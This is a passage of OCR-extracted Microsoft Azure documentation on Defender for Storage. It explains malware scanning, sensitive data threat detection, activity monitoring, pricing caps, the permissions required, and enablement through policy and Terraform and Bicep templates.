Activity monitoring, Malware Scanning, Sensitive Data Discovery 
Azure Files (over REST API and SMB): Activity monitoring 


For Malware Scanning and sensitive data threat detection at subscription and 
storage account levels, you need Owner roles (subscription owner/storage 
account owner) or specific roles with corresponding data actions. To enable 
Activity Monitoring, you need ‘Security Admin’ permissions. Read more about 
the required permissions. 


@ commercial clouds* 

* Azure Government (only activity monitoring support on the classic plan) 
XI Microsoft Azure operated by 21Vianet 

* Connected AWS accounts 


* Azure DNS Zone isn't supported for Malware Scanning and sensitive data threat 


detection. 


What are the benefits of Microsoft Defender 
for Storage? 


Comprehensive cloud storage protection 


Defender for Storage 


Prevent sensitive data from leaking 


Prevent malware upload and distribution 


@®> > ®> @> 


Cloud 
storage 


Powered by Microsoft Threat Intelligence | Built-in integration with Microsoft Sentinel 


Control and data Behavioral modeling Near real-time Detect sensitive 
plane activity to identify early malware scanning data exposure and 
monitoring signs of breach across all file types exfiltration events 


Defender for Storage provides the following: 


e Better protection against malware: The Malware Scanning scans and detects in 
near real-time all file types, including archives of every uploaded blob, and 
provides fast and reliable results, helping you prevent your storage accounts from 
acting as an entry and distribution point for threats. Learn more about Malware 
Scanning. 


e Improved threat detection and protection of sensitive data: The sensitive data 
threat detection capability enables security professionals to efficiently prioritize 
and examine security alerts by considering the sensitivity of the data that could be 
at risk, leading to better detection and protection against potential threats. By 
quickly identifying and addressing the most significant risks, this capability lowers 
the likelihood of data breaches and enhances sensitive data protection by 
detecting exposure events and suspicious activities on resources containing 


sensitive data. Learn more about sensitive data threat detection. 


e Detection of entities without identities: Defender for Storage detects suspicious 
activities generated by entities without identities that access your data using 
misconfigured and overly permissive Shared Access Signatures (SAS tokens) that 
may have leaked or compromised so that you can improve the security hygiene 
and reduce the risk of unauthorized access. This capability is an expansion of the 
Activity Monitoring security alerts suite. 


e Coverage of the top cloud storage threats: Powered by Microsoft Threat 
Intelligence, behavioral models, and machine learning models to detect unusual 
and suspicious activities. The Defender for Storage security alerts covers the top 


cloud storage threats, such as sensitive data exfiltration, data corruption, and 
malicious file uploads. 


e Comprehensive security without enabling logs: When Microsoft Defender for 
Storage is enabled, it continuously analyzes both the data plane and control plane 
telemetry stream generated by Azure Blob Storage, Azure Files, and Azure Data 
Lake Storage services without the requirement of enabling diagnostic logs. 


e Frictionless enablement at scale: Microsoft Defender for Storage is an agentless 
solution, easy to deploy, and enables security protection at scale using a native 


Azure solution. 


How does the service work? 


Activity monitoring 


Defender for Storage continuously analyzes data and control plane logs from protected 
storage accounts when enabled. There's no need to turn on resource logs for security 
benefits. Use Microsoft Threat Intelligence to identify suspicious signatures such as 
malicious IP addresses, Tor exit nodes, and potentially dangerous apps. It also builds 
data models and uses statistical and machine-learning methods to spot baseline activity 
anomalies, which may indicate malicious behavior. You receive security alerts for 
suspicious activities, but Defender for Storage ensures you won't get too many similar 
alerts. Activity monitoring won't affect performance, ingestion capacity, or access to 
your data. 


Control and data plane activity monitoring 
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Malware Scanning (powered by Microsoft Defender 
Antivirus) 


© Note 


Billing for Malware Scanning begins on September 3, 2023. To limit expenses, use 
the Monthly capping feature to set a cap on the amount of GB scanned per month, 


per storage account to help you control your costs. 


Malware Scanning in Defender for Storage helps protect storage accounts from 
malicious content by performing a full malware scan on uploaded content in near real 
time, applying Microsoft Defender Antivirus capabilities. It's designed to help fulfill 
security and compliance requirements to handle untrusted content. Every file type is 
scanned, and scan results are returned for every file. The Malware Scanning capability is 
an agentless SaaS solution that allows simple setup at scale, with zero maintenance, and 
supports automating response at scale. This is a configurable feature in the new 
Defender for Storage plan that is priced per GB scanned. Learn more about Malware 


Scanning. 


Sensitive data threat detection (powered by Sensitive 
Data Discovery) 


The ‘sensitive data threat detection’ capability enables security teams to efficiently 
prioritize and examine security alerts by considering the sensitivity of the data that could 
be at risk, leading to better detection and preventing data breaches. ‘Sensitive data 
threat detection’ is powered by the “Sensitive Data Discovery” engine, an agentless 
engine that uses a smart sampling method to find resources with sensitive data. The 
service is integrated with Microsoft Purview's sensitive information types (SITs) and 
classification labels, allowing seamless inheritance of your organization's sensitivity 
settings. 


This is a configurable feature in the new Defender for Storage plan. You can choose to 
enable or disable it with no other cost. For more details, visit Sensitive data threat 
detection. 


Pricing and cost controls 


Per storage account pricing 


The new Microsoft Defender for Storage plan has predictable pricing based on the 
number of storage accounts you protect. With the option to enable at the subscription 
or resource level and exclude specific storage accounts from protected subscriptions, 
you have increased flexibility to manage your security coverage. The pricing plan 
simplifies the cost calculation process, allowing you to scale easily as your needs 
change. Other charges may apply to storage accounts with high-volume transactions. 


Malware Scanning - Billing per GB, monthly capping, and 
configuration 


Malware Scanning is charged on a per-gigabyte basis for scanned data. To ensure cost 
predictability, a monthly cap can be established for each storage account's scanned data 
volume, per-month basis. This cap can be set subscription-wide, affecting all storage 
accounts within the subscription, or applied to individual storage accounts. Under 
protected subscriptions, you can configure specific storage accounts with different 
limits. 


By default, the limit is set to 5,000 GB per month per storage account. Once this 
threshold is exceeded, scanning will cease for the remaining blobs, with a 20-GB 
confidence interval. For configuration details, refer to configure Defender for Storage. 


Enablement at scale with granular controls 


Microsoft Defender for Storage enables you to secure your data at scale with granular 
controls. You can apply consistent security policies across all your storage accounts 
within a subscription or customize them for specific accounts to suit your business 
needs. You can also control your costs by choosing the level of protection you need for 
each resource. To get started, visit enable Defender for Storage. 


Understanding the differences between 
Malware Scanning and hash reputation 
analysis 


Defender for Storage offers two capabilities to detect malicious content uploaded to 
storage accounts: Malware Scanning (paid add-on feature available only on the new 
plan) and hash reputation analysis (available in all plans). 


Malware Scanning (paid add-on feature available only on 
the new plan) 


Malware Scanning uses Microsoft Defender Antivirus (MDAV) to scan blobs uploaded to 
Blob storage, providing a comprehensive analysis that includes deep file scans and hash 
reputation analysis. This feature provides an enhanced level of detection against 
potential threats. 


Hash reputation analysis (available in all plans) 


Hash reputation analysis detects potential malware in Blob storage and Azure Files by 
comparing the hash values of newly uploaded blobs/files against those of known 
malware by Microsoft Threat Intelligence £. Not all file protocols and operation types 
are supported with this capability, leading to some operations not being monitored for 
potential malware uploads. Unsupported use cases include SMB file shares and when a 
blob is created using Put Block and Put blocklist. 


In summary, Malware Scanning, which is only available on the new plan for Blob storage, 
offers a more comprehensive approach to malware detection by analyzing the full 
content of files and incorporating hash reputation analysis in its scanning methodology. 


Next steps 
In this article, you learned about Microsoft Defender for Storage. 


e Enable Defender for Storage 
e Check out common questions about Defender for Storage. 


Malware scanning in Defender for 
Storage 
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Malware Scanning in Defender for Storage helps protect your storage accounts from 
malicious content by performing a full malware scan on uploaded content in near real 
time, using Microsoft Defender Antivirus capabilities. It's designed to help fulfill security 
and compliance requirements for handling untrusted content. 


The Malware Scanning capability is an agentless SaaS solution that allows simple setup 
at scale, with zero maintenance, and supports automating response at scale. 


Detect malicious files upon upload in near-real time 
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Malware upload is a top threat on cloud 
storage 


Content uploaded to cloud storage could be malware. Storage accounts can be a 
malware entry point into the organization and a malware distribution point. To protect 
organizations from this threat, content in cloud storage must be scanned for malware 


before it's accessed. 


Malware scanning in Defender for Storage 
helps protect storage accounts from malicious 


content 


e A built-in SaaS solution that allows simple enabling at scale with zero maintenance. 

e Comprehensive antimalware capabilities using Microsoft Defender Antivirus 
(MDAV), catching polymorphic and metamorphic malware. 

e Every file type is scanned (including archives like zip files) and a result is returned 
for every scan. The file size limit is 2 GB. 

e Supports response at scale — deleting or quarantining suspicious files, based on the 
blobs’ index tags or Event Grid events. 

e When the malware scan identifies a malicious file, detailed Microsoft Defender for 
Cloud security alerts are generated. 

e Designed to help fulfill security and compliance requirements to scan untrusted 
content uploaded to storage, including an option to log every scan result. 


Common use-cases and scenarios 


Some common use-cases and scenarios for malware scanning in Defender for Storage 
include: 


e Web applications: many cloud web applications allow users to upload content to 
storage. This allows low maintenance and scalable storage for applications like tax 
apps, CV upload HR sites, and receipts upload. 


e Content protection: assets like videos and photos are commonly shared and 
distributed at scale both internally and to external parties. CDNs (Content Delivery 
Network) and content hubs are a classic malware distribution opportunity. 


e Compliance requirements: resources that adhere to compliance standards like 
NIST, SWIFT, GDPR, and others require robust security practices, which include 
malware scanning. It's critical for organizations operating in regulated industries or 
regions. 


e Third-party integration: third-party data can come from a wide variety of sources, 
and not all of them might have robust security practices, such as business partners, 
developers, and contractors. Scanning for malware helps to ensure that this data 
doesn't introduce security risks to your system. 


e Collaborative platforms: similar to file sharing, teams use cloud storage for 
continuously sharing content and collaborating across teams and organizations. 
Scanning for malware ensures safe collaboration. 


e Data pipelines: data moving through ETL (Extract, Transfer, Load) processes can 
come from multiple sources and might include malware. Scanning for malware can 
help to ensure the integrity of these pipelines. 


e Machine learning training data: the quality and security of the training data are 
critical for effective machine learning models. It's important to ensure these data 
sets are clean and safe, especially if they include user-generated content or data 


from external sources. 


Employee Tax Receipt Submission Portal 


A secure platform for all employees to upload their tax receipts for efficient processing and reimbursement 
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O Note 


Malware scanning is a near real time service. Scan times can vary depending on the 
scanned file size or file type as well as on the load on the service or on the storage 
account. Microsoft is constantly working on reducing the overall scan time, 
however you should take this variability in scan times into consideration when 
designing a user experience based the service. 


Prerequisites 


To enable and configure Malware Scanning, you must have Owner roles (such as 
Subscription Owner or Storage Account Owner) or specific roles with the necessary data 


actions. Learn more about the 


You can enable and configure Malware Scanning at scale for your subscriptions while 
maintaining granular control over configuring the feature for individual storage 
accounts. There are several ways to enable and configure Malware Scanning: Azure 
built-in policy (the recommended method), programmatically using Infrastructure as 
Code templates, including Terraform, Bicep, and ARM templates, using the Azure portal, 
or directly with the REST API. 


How does malware scanning work 
On-upload malware scanning 


On-upload triggers 


When a blob is uploaded to a protected storage account - a malware scan is triggered. 
All upload methods trigger the scan. Modifying a blob is an upload operation and 
therefore the modified content is scanned after the update. 


Scan regions and data retention 


The malware scanning service that uses Microsoft Defender Antivirus technologies reads 
the blob. Malware Scanning scans the content "in-memory" and deletes scanned files 
immediately after scanning. The content isn't retained. The scanning occurs within the 
same region of the storage account. In some cases, when a file is suspicious, and more 
data is required, Malware Scanning might share file metadata outside the scanning 
region, including metadata classified as customer data (for example, SHA-256 hash), 
with Microsoft Defender for Endpoint. 


Access customer data 


The Malware Scanning service requires access to your data to scan your data for 
malware. During service enablement, a new Data Scanner resource called 
StorageDataScanner is created in your Azure subscription. This resource is granted with 
a Storage Blob Data Owner role assignment to access and change your data for malware 
scanning and sensitive data discovery. 


Private Endpoint is supported out-of-the-box 


Malware scanning in Defender for Storage is supported in storage accounts that use 
private endpoints while maintaining data privacy. 


Private endpoints provide secure connectivity to your Azure storage services, eliminating 
public internet exposure, and are considered a best practice. 


Set up of malware scanning 


When malware scanning is enabled, the following actions automatically take place in 


your environment: 


e For each storage account you enable malware scanning on, an Event Grid System 
Topic resource is created in the same resource group of the storage account - used 
by the malware scanning service to listen on blob upload triggers. Removing this 
resource breaks the malware scanning functionality. 


e Toscan your data, the Malware Scanning service requires access to your data. 
During service enablement, a new Data Scanner resource called 
StorageDataScanner is created in your Azure subscription and assigned with a 
system-assigned managed identity. This resource is granted with the Storage Blob 
Data Owner role assignment permitting it to access your data for purposes of 
Malware Scanning and Sensitive Data Discovery. 


If your storage account Networking configuration is set to Enable Public network access 
from selected virtual networks and IP addressed, the StorageDataScanner resource is 
added to the Resource instances section under storage account Networking 
configuration to allow access to scan your data. 


If you're enabling malware scanning on the subscription level, a new Security Operator 
resource called 

StorageAccounts/securityOperators/DefenderForStorageSecurityOperator is created in 
your Azure subscription and assigned with a system-managed Identity. This resource is 
used to enable and repair Defender for Storage and Malware Scanning configuration on 
existing storage accounts and check for new storage accounts created in the 
subscription to be enabled. This resource has role assignments that include the specific 


permissions needed to enable malware scanning. 


O Note 


Malware scanning depends on certain resources, identities, and networking settings 
to function properly. If you modify or delete any of these, malware scanning will 
stop working. To restore its normal operation, you can turn it off and on again. 


Providing scan results 


Malware scanning scan results are available through four methods. After setup, you'll 
see scan results as blob index tags for every uploaded and scanned file in the storage 
account, and as Microsoft Defender for Cloud security alerts when a file is identified as 


malicious. 


You might choose to configure extra scan result methods, such as Event Grid and Log 
Analytics; these methods require extra configuration. In the next section, you'll learn 


about the different scan result methods. 


View and consume scan results 


Blob index tags Defender for Cloud Azure Event Grid Azure Log Analytics 
(not supported on ALDS Gen2) security alert workspace 


Scan results 


Blob index tags 


Blob index tags are metadata fields on a blob. They categorize data in your storage 
account using key-value tag attributes. These tags are automatically indexed and 
exposed as a searchable multi-dimensional index to easily find data. The scan results are 
concise, displaying Malware Scanning scan result and malware scanning scan time UTC 
in the blob metadata. Other result types (alerts, events, logs) provide more information 
on the malware type and file upload operation. 
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Blob index tags can be used by applications to automate workflows, but aren't tamper- 
resistant. Read more on setting up response. 


Defender for Cloud security alerts 


When a malicious file is detected, Microsoft Defender for Cloud generates a Microsoft 
Defender for Cloud security alert. To see the alert, go to Microsoft Defender for Cloud 
security alerts. The security alert contains details and context on the file, the malware 
type, and recommended investigation and remediation steps. To use these alerts for 
remediation, you can: 


1. View security alerts Z in the Azure portal by navigating to Microsoft Defender for 
Cloud > Security alerts. 

2. Configure automations based on these alerts. 

3. Export security alerts to a SIEM. You can continuously export security alerts 
Microsoft Sentinel (Microsoft's SIEM) using Microsoft Sentinel connector, or 
another SIEM of your choice. 


Learn more about responding to security alerts. 


Event Grid event 


Event Grid is useful for event-driven automation. It's the fastest method to get results 
with minimum latency in a form of events that you can use for automating response. 


Events from Event Grid custom topics can be consumed by multiple endpoint types. The 


most useful for malware scanning scenarios are: 


e Function App (previously called Azure Function) — use a serverless function to run 
code for automated response like move, delete or quarantine. 

e Webhook - to connect an application. 

e Event Hubs & Service Bus Queue - to notify downstream consumers. 


Learn how to configure Malware Scanning so that every scan result is sent automatically 
to an Event Grid topic for automation purposes. 


Logs analytics 


You might want to log your scan results for compliance evidence or investigating scan 
results. By setting up a Log Analytics Workspace destination, you can store every scan 
result in a centralized log repository that is easy to query. You can view the results by 

navigating to the Log Analytics destination workspace and looking for the 


StorageMalwareScanningResults table. 


Learn more about setting up logging for malware scanning. 


Q Tip 


We invite you to explore the Malware Scanning feature in Defender for Storage 
through our hands-on lab. Follow the Ninja training “ instructions for a detailed, 
step-by-step guide on how to set up and test Malware Scanning end-to-end, 
including configuring responses to scanning results. This is part of the ‘labs’ project 
that helps customers get ramped up with Microsoft Defender for Cloud and 
provide hands-on practical experience with its capabilities. 


Cost control 


Malware scanning is billed per GB scanned. To provide cost predictability, Malware 
Scanning supports setting a cap on the amount of GB scanned in a single month per 


storage account. 


The "capping" mechanism is designed to set a monthly scanning limit, measured in 
gigabytes (GB), for each storage account, serving as an effective cost control. If a 
predefined scanning limit is established for a storage account in a single calendar 
month, the scanning operation would automatically halt once this threshold is reached 


(with up to a 20-GB deviation), and files wouldn't be scanned for malware. Updating the 
cap typically takes up to an hour to take effect. 


By default, a limit of 5 TB (5,000 GB) is established if no specific capping mechanism is 
defined. 


Q Tip 


You can set the capping mechanism on either individual storage accounts or across 
an entire subscription (every storage account on the subscription will be allocated 
the limit defined on the subscription level). 


Follow these steps to configure the capping mechanism. 


Handling possible false positives 


If you have a file that you suspect might be malware or is being incorrectly detected, 
you can submit it to us for analysis through the sample submission portal. Select 
“Microsoft Defender for Storage” as the source. 


Malware Scanning doesn't block access or change permissions to the uploaded blob, 
even if it's malicious. 


Limitations 


Unsupported features and services 


e Unsupported storage accounts: Legacy v1 storage accounts aren't supported by 
malware scanning. 

e Unsupported service: Azure Files isn't supported by malware scanning. 

e Unsupported blob types: Append and Page blobs aren't supported for Malware 
Scanning. 

e Unsupported encryption: Client-side encrypted blobs aren't supported as they 
can't be decrypted before scanning by the service. However, data encrypted at rest 
by Customer Managed Key (CMK) is supported. 

e Unsupported index tag results: Index tag scan result isn't supported in storage 
accounts with Hierarchical namespace enabled (Azure Data Lake Storage Gen2). 

e Event Grid: Event Grid topics that don't have public network access enabled (i.e. 
private endpoint connections) are not supported by malware scanning in Defender 
for Storage. 


Throughput capacity and blob size limit 


e Scan throughput rate limit: Malware Scanning can process up to 2 GB per minute 
for each storage account. If the rate of file upload momentarily exceeds this 
threshold for a storage account, the system attempts to scan the files in excess of 
the rate limit. If the rate of file upload consistently exceeds this threshold, some 
blobs won't be scanned. 


e Blob scan limit: Malware Scanning can process up to 2,000 files per minute for 
each storage account. If the rate of file upload momentarily exceeds this threshold 
for a storage account, the system attempts to scan the files in excess of the rate 
limit. If the rate of file upload consistently exceeds this threshold, some blobs 
won't be scanned. 


e Blob size limit: The maximum size limit for a single blob to be scanned is 2 GB. 
Blobs that are larger than the limit won't be scanned. 
Blob uploads and index tag updates 


Upon uploading a blob to the storage account, the malware scanning initiates an extra 
read operation and updates the index tag. In most cases, these operations don't 
generate significant load. 


Impact on access and storage IOPS 


Despite the scanning process, access to uploaded data remains unaffected, and the 
impact on storage Input/Output Operations Per Second (IOPS) is minimal. 


Next steps 


Learn more on how to set up response for malware scanning results. 


Detect threats to sensitive data 
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Sensitive data threat detection lets you efficiently prioritize and examine security alerts 
by considering the sensitivity of the data that could be at risk, leading to better 
detection and preventing data breaches. By quickly identifying and addressing the most 
significant risks, this capability helps security teams reduce the likelihood of data 
breaches and enhances sensitive data protection by detecting exposure events and 


suspicious activities on resources containing sensitive data. 


This is a configurable feature in the new Defender for Storage plan. You can choose to 
enable or disable it with no additional cost. 


Learn more about scope and limitations of sensitive data scanning. 


How does sensitive data discovery work? 


Sensitive data threat detection is powered by the sensitive data discovery engine, an 
agentless engine that uses a smart sampling method to find resources with sensitive 
data. 


The service is integrated with Microsoft Purview's sensitive information types (SITs) and 
classification labels, allowing seamless inheritance of your organization's sensitivity 
settings. This ensures that the detection and protection of sensitive data aligns with your 
established policies and procedures. 
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Upon enablement, the engine initiates an automatic scanning process across all 
supported storage accounts. Results are typically generated within 24 hours. 
Additionally, newly created storage accounts under protected subscriptions are scanned 
within six hours of their creation. Recurring scans are scheduled to occur weekly after 
the enablement date. This is the same engine that Defender CSPM uses to discover 


sensitive data. 


Prerequisites 


Sensitive data threat detection is available for Blob storage accounts, including: 
Standard general-purpose V1, Standard general-purpose V2, Azure Data Lake Storage 
Gen2, and Premium block blobs. Learn more about the availability of Defender for 
Storage features. 


To enable sensitive data threat detection at subscription and storage account levels, you 
need to have the relevant data-related permissions from the Subscription owner or 
Storage account owner roles. Learn more about the roles and permissions required for 
sensitive data threat detection. 


Enabling sensitive data threat detection 


Sensitive data threat detection is enabled by default when you enable Defender for 
Storage. You can enable it or disable it in the Azure portal or with other at-scale 
methods. This feature is included in the price of Defender for Storage. 


Using the sensitivity context in the security 
alerts 


The sensitive data threat detection capability helps security teams identify and prioritize 
data security incidents for faster response times. Defender for Storage alerts include 
findings of sensitivity scanning and indications of operations that have been performed 


on resources containing sensitive data. 


In the alert’s extended properties, you can find sensitivity scanning findings for a blob 
container: 


e Sensitivity scanning time UTC - when the last scan was performed 
e Top sensitivity label - the most sensitive label found in the blob container 
e Sensitive information types - information types that were found and whether they 


are based on custom rules 


e Sensitive file types - the file types of the sensitive data 


P Search resources, services and docs (G+/) 
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Integrate with the organizational sensitivity 
settings in Microsoft Purview (optional) 


When you enable sensitive data threat detection, the sensitive data categories include 
built-in sensitive information types (SITs) in the default list of Microsoft Purview. This will 
affect the alerts you receive from Defender for Storage: storage or containers that are 
found with these SITs are marked as containing sensitive data. 


To customize the Data Sensitivity Discovery for your organization, you can create custom 
sensitive information types (SITs) and connect to your organizational settings with a 


single step integration. Learn more here. 


You also can create and publish sensitivity labels for your tenant in Microsoft Purview 
with a scope that includes Items and Schematized data assets and Auto-labeling rules 
(recommended). Learn more about sensitivity labels in Microsoft Purview. 


Next steps 


In this article, you learned about Microsoft Defender for Storage's sensitive data 


scanning. 


Enable Defender for Storage 


Deploy Microsoft Defender for Storage 
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Microsoft Defender for Storage is an Azure-native solution offering an advanced layer of 
intelligence for threat detection and mitigation in storage accounts, powered by 
Microsoft Threat Intelligence“, Microsoft Defender Antimalware technologies, and 
Sensitive Data Discovery. With protection for Azure Blob Storage, Azure Files, and Azure 
Data Lake Storage services, it provides a comprehensive alert suite, near real-time 
Malware Scanning (add-on), and sensitive data threat detection (no extra cost), allowing 
quick detection, triage, and response to potential security threats with contextual 
information. It helps prevent the three major impacts on your data and workload: 
malicious file uploads, sensitive data exfiltration, and data corruption. 


With Microsoft Defender for Storage, organizations can customize their protection and 
enforce consistent security policies by enabling it on subscriptions and storage accounts 
with granular control and flexibility. 


Q Tip 


If you're currently using Microsoft Defender for Storage classic, consider migrating 
to the new plan, which offers several benefits over the classic plan. 


Availability 


Aspect Details 

Release state: General Availability (GA) 

Feature - Activity monitoring (security alerts) - General Availability (GA) 
availability: - Malware Scanning — General Availability (GA) 


- Sensitive data threat detection (Sensitive Data Discovery) — Preview 


Visit the pricing page Z to learn more. 


Required roles For Malware Scanning and sensitive data threat detection at subscription and 

and storage account levels, you need Owner roles (subscription owner/storage 

permissions: account owner) or specific roles with corresponding data actions. To enable 
Activity Monitoring, you need ‘Security Admin’ permissions. Read more about 
the required permissions. 


Clouds: @ Azure Commercial clouds* 
* Azure Government (only activity monitoring support on the classic plan) 


Aspect Details 


X Azure China 21Vianet 
* Connected AWS accounts 


*Azure DNS Zone is not supported for Malware Scanning and sensitive data threat 
detection. 


Prerequisites for Malware scanning 


To enable and configure Malware Scanning, you must have Owner roles (such as 
Subscription Owner or Storage Account Owner) or specific roles with the necessary data 
actions. Learn more about the required permissions. 


Set up and configure Microsoft Defender for 
Storage 


To enable and configure Microsoft Defender for Storage and ensure maximum 
protection and cost optimization, the following configuration options are available: 


e Enable/disable Microsoft Defender for Storage at the subscription and storage 
account levels. 

e Enable/disable the Malware Scanning or sensitive data threat detection 
configurable features. 

e Seta monthly cap ("capping") on the Malware Scanning per storage account per 
month to control costs (default value is 5,000GB). 

e Configure methods to set up response to malware scanning results. 

e Configure methods for saving malware scanning results logging. 


Q Tip 


The Malware Scanning feature has advanced configurations to help security teams 
support different workflows and requirements. 


e Override subscription-level settings to configure specific storage accounts with 
custom configurations that differ from the settings configured at the subscription 


level. 


There are several ways to enable and configure Defender for Storage: using the Azure 
built-in policy (the recommended method), programmatically using Infrastructure as 


Code templates, including Terraform, Bicep, and ARM templates, using the Azure portal, 
or directly with the REST API. 


Enabling Defender for Storage via a policy is recommended because it facilitates 
enablement at scale and ensures that a consistent security policy is applied across all 
existing and future storage accounts within the defined scope (such as entire 
management groups). This keeps the storage accounts protected with Defender for 
Storage according to the organization's defined configuration. 


O Note 


To prevent migrating back to the legacy classic plan, make sure to disable the old 
Defender for Storage policies. Look for and disable policies named configure Azure 
Defender for Storage to be enabled, Azure Defender for Storage should be 
enabled, or Configure Microsoft Defender for Storage to be enabled (per-storage 


account plan) or deny policies that prevent the disablement of the classic plan. 


Next steps 


e Learn how to enable and Configure the Defender for Storage plan at scale with an 
Azure built-in policy. 


Required permissions for enabling 
Defender for Storage and its features 
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This article lists the permissions required to enable Defender for Storage and its 
features. 


Microsoft Defender for Storage is an Azure-native layer of security intelligence that 
detects potential threats to your storage accounts. It helps prevent the three major 
impacts on your data and workload: malicious file uploads, sensitive data exfiltration, 
and data corruption. 


e Activity monitoring: Detects suspicious activities in storage accounts by analyzing 
data plane and control plane activities and using Microsoft Threat Intelligence, 


behavioral modeling, and machine-learning. 


e Malware Scanning: Scans all uploaded blobs in near-real time using Microsoft 
Defender Antivirus to protect storage accounts from malicious content. 


e Sensitive data threat detection: Prioritizes security alerts based on data sensitivity 
discovered by the Sensitive Data Discovery Engine, detects exposure events and 
suspicious activities, enhancing protection against data breaches. 


Depending on the scenario, you need different levels of permissions to enable Defender 
for Storage and its features. You can enable and configure Defender for Storage at the 
subscription level or at the storage account level. You can also use built-in Azure policies 
to enable Defender for Storage and enforce its enablement on a desired scope. 


The following table summarizes the permissions you need for each scenario. The 
permissions are either built-in Azure roles or action sets that you can assign to custom 


roles. 

Capability Subscription Storage account level 
level 

Activity Security Admin or Security Admin or 

monitoring Pricings/read, Microsoft.Security/defenderforstoragesettings/read, 
Pricings/write Microsoft.Security/defenderforstoragesettings/write 

Malware Subscription Storage Account Owner or action set 2 

scanning Owner or action 


set 1 


Capability Subscription Storage account level 


level 
Sensitive Subscription Storage Account Owner or action set 2 
data threat Owner or action 
detection set 1 


O Note 


Activity monitoring is always enabled when you enable Defender for Storage. 


The action sets are collections of Azure resource provider operations that you can use to 


create custom roles. The action sets for enabling Defender for Storage and its features 


are: 


Action set 1: Subscription level enablement and 
configuration 


Microsoft.Security/pricings/write 
Microsoft.Security/pricings/read 
Microsoft.Security/pricings/SecurityOperators/read 
Microsoft.Security/pricings/SecurityOperators/write 
Microsoft.Authorization/roleAssignments/read 
Microsoft.Authorization/roleAssignments/write 
Microsoft.Authorization/roleAssignments/delete 


Action set 2: Storage account level enablement 
and configuration 


Microsoft.Storage/storageAccounts/write 
Microsoft.Storage/storageAccounts/read 
Microsoft.Security/defenderforstoragesettings/read 
Microsoft.Security/defenderforstoragesettings/write 
Microsoft.EventGrid/eventSubscriptions/read 
Microsoft.EventGrid/eventSubscriptions/write 
Microsoft.EventGrid/eventSubscriptions/delete 
Microsoft.Authorization/roleAssignments/read 
Microsoft.Authorization/roleAssignments/write 
Microsoft.Authorization/roleAssignments/delete 


Enable and configure at scale with an 
Azure built-in policy 
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Enabling Defender for Storage via a policy is recommended because it facilitates 
enablement at scale and ensures that a consistent security policy is applied across all 
existing and future storage accounts within the defined scope (such as entire 
management groups). This keeps the storage accounts protected with Defender for 
Storage according to the organization's defined configuration. 


Q Tip 


You can always configure specific storage accounts with custom configurations 
that differ from the settings configured at the subscription level (override 
subscription-level settings). 


Azure built-in policy 


To enable and configure Defender for Storage at scale with an Azure built-in policy, 
follow these steps: 


1. Sign in to the Azure portal and navigate to the Policy dashboard. 
2. In the Policy dashboard, select Definitions from the left-side menu. 


3. In the “Security Center” category, search for and then select Configure Microsoft 
Defender for Storage to be enabled. This policy enables all Defender for Storage 
capabilities: Activity Monitoring, Malware Scanning and Sensitive Data Threat 
Detection. You can also get it here: List of built-in policy definitions. If you want to 
enable a policy without the configurable features, use Configure basic Microsoft 
Defender for Storage to be enabled (Activity Monitoring only). 


Policy | Definitions 


4. Select the policy and review it. 


5. Select Assign and edit the policy details. You can fine-tune, edit, and add custom 


rules to the policy. 


Home > Policy | Definition: 


Configure Microsoft Defender for Storage to be enabled 
Policy definition 


D Duplicate definition 


er of security intelligence that detects potential thre, Definition ID /providers/Microsoft. Authorization/policyDefinitions/cfdcS972-7Sb3-4418-8ae1-7f5c36839390 


Built- 


6. Once you have completed reviewing, select Review + create. 


7. Select Create to assign the policy. 


Q Tip 


Malware Scanning can be configured to send scanning results to the following: 
Event Grid custom topic - for near-real time automatic response based on every 
scanning result. Learn more how to configure malware scanning to send scanning 
events to an Event Grid custom topic. 

Log Analytics workspace - for storing every scan result in a centralized log 
repository for compliance and audit. Learn more how to configure malware 
scanning to send scanning results to a Log Analytics workspace. 


Learn more on how to set up response for malware scanning results. 


Next steps 


Learn how to enable and configure Microsoft Defender for Storage with laC templates. 


Enable and configure with Infrastructure 
as Code templates 
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We recommend that you enable Defender for Storage on the subscription level. Doing 
so ensures all storage accounts in the subscription will be protected, including future 


ones. 


Q Tip 


You can always configure specific storage accounts with custom configurations 
that differ from the settings configured at the subscription level (override 


subscription-level settings). 


Enable on a subscription 


Terraform template 


To enable and configure Microsoft Defender for Storage at the subscription level 


using Terraform, you can use the following code snippet: 


resource "azurerm_security_center_subscription_pricing" 
"DefenderForStorage" { 


tier = "Standard" 
resource type = "StorageAccounts" 
subplan = "DefenderForStorageV2" 


extension { 
name = "OnUploadMalwareScanning" 
additional _extension_properties = { 
CapGBPerMonthPerStorageAccount = "5000" 


} 
} 


extension { 
name = "SensitiveDataDiscovery" 


} 
} 


Modifying the monthly cap for malware scanning 


To modify the monthly cap for malware scanning per storage account, adjust the 
CapGBPerMonthPerStorageAccount parameter to your preferred value. This parameter 
sets a cap on the maximum data that can be scanned for malware each month per 
storage account. If you want to permit unlimited scanning, assign the value "-1". 
The default limit is set at 5,000 GB. 


Disabling features 


If you want to turn off the on-upload malware scanning or sensitive data threat 
detection features, you can remove the corresponding extension block from the 
Terraform code. 


Disabling the entire Defender for Storage plan 


To disable the entire Defender for Storage plan, set the tier property value to 


"Free" and remove the subPlan and extension properties. 


Learn more about the azurerm_security_center_subscription_pricing resource by 


referring to the azurerm_security_center_subscription_pricing documentation Z. 
Additionally, you can find comprehensive details on the Terraform provider for 
Azure in the Terraform AzureRM Provider documentation £. 


Bicep template 


To enable and configure Microsoft Defender for Storage at the subscription level 
using Bicep, make sure your target scope is set to subscription, and add the 
following to your Bicep template: 


resource StorageAccounts 'Microsoft.Security/pricings@2023-01-01' = { 
name: 'StorageAccounts' 
properties: { 
pricingTier: ‘Standard’ 
subPlan: '‘DefenderForStorageV2' 
extensions: [ 
{ 
name: 'OnUploadMalwareScanning' 
isEnabled: 'True' 
additionalExtensionProperties: { 
CapGBPerMonthPerStorageAccount: '5000' 


} 


name: 'SensitiveDataDiscovery' 
isEnabled: 'True' 


Modifying the monthly cap for malware scanning 


To modify the monthly cap for malware scanning per storage account, adjust the 
CapGBPerMonthPerStorageAccount parameter to your preferred value. This parameter 
sets a cap on the maximum data that can be scanned for malware each month per 
storage account. If you want to permit unlimited scanning, assign the value -1. The 
default limit is set at 5,000 GB. 


Disabling features 


If you want to turn off the On-upload malware scanning or Sensitive data threat 
detection features, you can change the isEnabled value to False under sensitive 


data discovery. 
Disabling the entire Defender for Storage plan 


To disable the entire Defender for Storage plan, set the pricingTier property value 


to Free and remove the subPlan and extensions properties. 


Learn more about the Bicep template in the Microsoft security/pricings 
documentation. 


Azure Resource Manager template 


To enable and configure Microsoft Defender for Storage at the subscription level 
